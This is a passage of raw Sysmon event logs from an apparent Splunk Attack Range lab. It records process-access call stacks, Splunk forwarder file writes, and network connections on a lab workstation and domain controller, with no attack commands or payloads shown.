08:08:27.030{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810509Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:27.030{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F87B-60EB-E779-00000000D001}1980C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810508Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.030{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F87B-60EB-E779-00000000D001}1980C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810507Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.015{0C1E0330-F87B-60EB-E779-00000000D001}1980C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810550Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:28.890{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8775A8CD6BA8523D5DB1CEF8F398111F,SHA256=67C814316DE469620677597260C7393EBD40F4889630E843A8DF34214712EE68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054933Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:28.204{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84607A4278C8497D68E5C049F52975C7,SHA256=942E306814DBE37D905E6DD8C17FB061E97DA1C2A92DC78FDF73907B5EB008FC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810549Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:28.593{0C1E0330-F87C-60EB-E979-00000000D001}23563808C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810548Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:28.405{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F87C-60EB-E979-00000000D001}2356C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810547Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:28.405{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810546Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:28.405{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810545Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:28.405{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810544Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:28.405{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810543Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:28.405{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810542Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:28.405{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810541Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:28.390{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810540Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:28.390{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810539Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:28.390{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810538Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:28.390{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F87C-60EB-E979-00000000D001}2356C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810537Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:28.390{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F87C-60EB-E979-00000000D001}2356C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810536Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:28.390{0C1E0330-F87C-60EB-E979-00000000D001}2356C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810535Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:28.077{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=373A836CBD022EA7D6DB7BF680AC6A1B,SHA256=EA143A7E7D15D55EF5EC6EABAA001F339BCFC64D387D76FC054DEBC1F5479884,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054934Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:29.221{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26E74BBBB5FAC05D5829F0A44584CAC4,SHA256=5B24DC50EE8988E4BEE750C5F5447695E7441EA1F7BCD68949B893C966B6670E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810552Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:28.215{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse89.248.165.74recyber.net48275-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000810551Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:29.405{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2E9A5BEDFEE55B4FA564E7C51D62CAE6,SHA256=7BE2ACC60D569FF0C323C91C4262EEB487AB301EBE9AE6E93DC318735E410164,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054936Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:21.912{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57472-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001054935Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:30.239{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F73F75DDDC908D2298FA0EA7A749494,SHA256=576E74A49E99FE88270FF75C55763AD4690CEE2ABF5627B7FF0AC088BD0CF4A4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810555Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:28.538{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57472-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000810554Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:30.218{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=E2C6E977ADCB88EA2BE7C07FD2DEB067,SHA256=F44F6951EFA90CB88DC686363BEB70E330739E38EB51C1A62520CECC8A1097B2,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000810553Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:30.093{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4F0964A34892C9235196530A13CCED5,SHA256=D26D2FE683F49DF8BE38474686FE49B05D02CFE03B9E5CBE1644F4D68BC6EACC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054977Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.962{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054976Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:31.909{466BC892-F87F-60EB-FE7D-00000000CF01}960810032C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054975Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:31.909{466BC892-F87F-60EB-FE7D-00000000CF01}960810032C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054974Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:31.909{466BC892-F87F-60EB-FE7D-00000000CF01}960810032C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\W